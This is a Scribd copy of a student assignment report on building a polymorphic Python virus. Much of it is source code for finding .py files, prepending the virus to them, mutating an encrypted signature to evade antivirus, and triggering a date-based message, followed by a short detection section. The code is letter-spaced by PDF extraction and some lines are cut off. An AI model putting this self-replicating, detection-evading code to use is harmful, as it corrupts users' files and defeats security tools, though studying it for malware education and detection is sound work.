Scribd
Upload
247 views8 pages

Report On Polymorphic Virus Code

This document describes the design of a polymorphic virus for educational purposes. It discusses three main parts of a virus: search, infect, and bomb. The virus uses a random encryption key each time it propagates to change its signature and avoid detection. When a specific date condition is met, the bomb portion prints a message. Machine learning and behavior-based techniques can help detect polymorphic viruses better than signature-based methods.

Uploaded by

sandip kishore
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
247 views8 pages

Report On Polymorphic Virus Code

This document describes the design of a polymorphic virus for educational purposes. It discusses three main parts of a virus: search, infect, and bomb. The virus uses a random encryption key each time it propagates to change its signature and avoid detection. When a specific date condition is met, the bomb portion prints a message. Machine learning and behavior-based techniques can help detect polymorphic viruses better than signature-based methods.

Uploaded by

sandip kishore
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 8

A Polymorphic Virus

Assignment No: 3
Sandip Kishore
1711CS12
September 10, 2019

1 Introduction
In this Assignment the task is to design a polymorphic virus for educational
purpose. At a high level there are 3 parts to any general virus:
1. Search : Search explores the current folder and finds .py files. If the file
is already infected, it skips it. Otherwise, it adds it to the list of files to
be infected.
2. Infect : Infect copies the virus portion of the code from itself and appends
at start it to each of the victim files. Therefore, whenever the infected
python files run, it runs the virus first.

3. Bomb : Bomb is the portion of the code that needs a trigger to execute.
In this case, it is triggered by a particular date and prints a message.

2 Polymorphic Virus
A polymorphic virus is a harmful, destructive or intrusive type of malware
that can change or ”morph,” making it difficult to detect with anti malware
programs. Evolution of the malicious code can occur in a variety of ways such as
varying signatures, filename changes, compression and encryption with variable
keys.
Although the appearance of the code in a polymorphic virus varies with
each ”mutation,” the essential function usually remains the same. For example,
a spyware program intended to act as a key-logger will continue to perform that
function even though its signature changes. If the spyware program is discov-
ered by an anti malware program and its signature is added to a downloadable
database, the anti-malware program will fail to detect the rogue code after the
signature changes, just as if a new spyware program has emerged. In this way,
malware creators gain an advantage over security vendors that use traditional
signature-based detection to find and block malicious code.

1
3 Implementation
In this assignment, polymorphic behaviour is implemented using the changing
the virus signature during propagation of virus.
# F o l l o w i n g code g e n e r a t e s t h e new s i g n a t u r e
# Using a random key each time v i r u s p r o p a g a t e s
key = random . r a n d r a n g e ( 3 , 1 0 )
SIGNATURE = ” 0SIMPLE PYTHON VIRUS”
d e c r y p t i o n K e y = int (SIGNATURE [ 0 ] )
SIGNATURE = SIGNATURE [ : pos ] + SIGNATURE [ ( pos + 1 ) : ]
f o r i in SIGNATURE:
temp = ord ( i ) − d e c r y p t i o n K e y
matchtemp = chr ( temp )
temp = chr ( key + temp )
encryptedSIGNATURE += temp
match += matchtemp
encryptedSIGNATURE = s t r ( key ) + encryptedSIGNATURE
A more advanced technique may be deployed using following code which will
add further layer of obfuscation by encrypting the content also
#a s i m p l e example o f a program t h a t r e p l i c a t e s and e n c r y p t s i t s e l f , t h u s a d d i n g
#When e x e c u t e d , i t e x e c u t e s some code t h e n i t g e n e r a t e s a new e n c r y p t i o n key , e n
#w i t h a randomly g e n e r a t e d name [ t h e n s e n d s t h e f i l e n a m e and e n c r y p t i o n key t o a

import random
import string
import pyDes
import time
import binascii

#code t o e x e c u t e b e f o r e s e l f p r o p a g a t i o n g o e s h e r e

N = 8 #8 d i g i t key
key = ’ ’ . j o i n ( random . c h o i c e ( s t r i n g . a s c i i u p p e r c a s e + s t r i n g . d i g i t s ) f o r x in ran
o b j = pyDes . d e s ( key , pad=b ’ \0 ’ ) #g e n e r a t e an o b j e c t e n c r y p t e d w i t h key
f d = open ( ’ p o l y . py ’ , ’ r ’ ) #open t h i s f i l e f o r r e a d i n g
payload = f d . r e a d ( ) #l o a d t h e e n t i r e c o n t e n t s i n t o a v a r i a b l e
e n c r y p t e d = o b j . e n c r y p t ( payload , pad=b ’ \0 ’ ) #e n c r y p t t h e
payload f i l e
N = 10 # 10 d i g i t f i l e name
f i l e n a m e = ’ ’ . j o i n ( random . c h o i c e ( s t r i n g . a s c i i u p p e r c a s e + s t r i n g . d i g i t s ) f o r x in
new fd = open ( f i l e n a m e , ’w ’ ) #c r e a t e a new f i l e w i t h t h e f i l e n a m e we j u s t g e n e r a
e n c r y p t e d = b i n a s c i i . b2a hex ( e n c r y p t e d )
new fd . w r i t e ( s t r ( e n c r y p t e d ) ) #w r i t e t h e e n c r y p t e d program t o our new f i l e
Searching for target space is done with following code:

2
# Code f o r s e a r c h i n g f o r t a r g e t t o i n f e c t t h e f i l e s
def s e a r c h ( path ) :
brk = 0
tempmatch = ” ”
filestoinfect = []
f i l e l i s t = o s . l i s t d i r ( path )
f o r f n in f i l e l i s t :
tempmatch = ” ”
print ( f n )
i f o s . path . i s d i r ( path + ” / ” + f n ) :
f i l e s t o i n f e c t . extend ( s e a r c h ( path + ” / ” + f n ) )
e l i f f n [ − 3 : ] == ” . py” :
infected = False
k = open ( path + ” / ” + f n )
f o r i , l i n e in enumerate ( k ) :
brk = 0
i f i == 11 and l i n e [ 1 3 ] . i s d i g i t ( ) :
# print ( line )
matchkey = l i n e [ 1 3 ]

f o r j in range ( 1 4 , 3 3 ) :
tempmatch += chr ( ord ( l i n e [ j ] ) − int ( matchkey ) )

i f match == tempmatch :
i n f e c t e d = True
brk = 1
break
i f brk == 1 :
print ( ”BRKEN” )
i f i n f e c t e d == F a l s e :
f i l e s t o i n f e c t . append ( path + ” / ” + f n )
return f i l e s t o i n f e c t
The following function is used to actually propagate the virus by appending
at the start of each file. Every time the virus propagates the signature is changed
implementing the polymorphic behaviour.
# This f u n c t i o n a c t u a l l y p r o p a g a t e s t h e v i r u s .
# Since , i t i s p o l y m o r p h i c each time a s i g n a t u r e i s g e n e r a t e d .
def i n f e c t ( f i l e s t o i n f e c t ) :
v i r u s = open ( o s . path . abspath ( file ))
v i r u s s t r i n g = ””
f o r i , l i n e in enumerate ( v i r u s ) :
i f i > 0 and i < 84 and i != 1 1 :
v i r u s s t r i n g += l i n e
i f i == 1 0 :
v i r u s s t r i n g += ”SIGNATURE = \” ” + encryptedSIGNATURE + ” \”\n”

3
virus . close
f o r fname in f i l e s t o i n f e c t :
f = open ( fname )
temp = f . r e a d ( )
f . close ()
f = open ( fname , ”w” )
f . w r i t e ( ” import o s \n” + v i r u s s t r i n g + temp )

f . close ()
Following is the code for the bomb which executes when a particular condi-
tion is met, in this case, on a specific date
# This f u n c t i o n i s a c t u a l l y where t h e v i r u s e x e c u t e s b a s e d on a s p e c i f i c c o n d i t i o
# In t h i s c a s e t h e c o n d i t i o n i s p a r t i c u l a r d a t e
def bomb ( ) :
i f d a t e t i m e . d a t e t i m e . now ( ) . month == 1 and d a t e t i m e . d a t e t i m e . now ( ) . day == 2 5 :
print ( ” i n f e c t e d . . Happy Bi rt hda y t o You ! ” )

4
4 Output
4.1 Original Virus
Below is the image of the original virus. The signature may be noted here

4.2 A victim file before infection


The file to be infected, a python file in this case, is shown here. For clarity, the
file is empty.

5
6
4.3 A victim file after infection
The file infected, a python file in this case, is shown here. The mutated signature

may be noted here.

5 Detection and Prevention


Most conventional antivirus and threat detection products rely on signature-
based detection, which can be fooled by polymorphic viruses. However, newer
security technologies employ machine learning and behavior-based analytics
rather than signature detection. Machine learning algorithms focus on anoma-
lous behavior of unknown programs as well as other static characteristics such
as file names and API calls.
A simple detection is implemented here which is based on a query string or
pattern search in suspicious files. This query or pattern may be constructed
based on heuristics obtained from anomalous behaviour. Machine learning and
AI techniques may be employed for sophisticated detection mechanism.

7
# This f u n c t i o n i s a c t u a l l y where t h e v i r u s e x e c u t e s b a s e d on a s p e c i f i c c o n d i t i o
# In t h i s c a s e t h e c o n d i t i o n i s p a r t i c u l a r d a t e
def w h i c h F i l e ( query ) :
i n f e c t e d =[]
f o r r o o t , d i r s , f i l e s in o s . walk ( ’ . ’ ) :
f o r f i l e in f i l e s :
with open ( f i l e ) a s f :
i f query in f . r e a d ( ) :
i n f e c t e d . append ( f )
return i n f e c t e d

query=” d e c r y p t i o n K e y ”
i n f e c t e d=w h i c h F i l e ( query )
print ( i n f e c t e d )

You might also like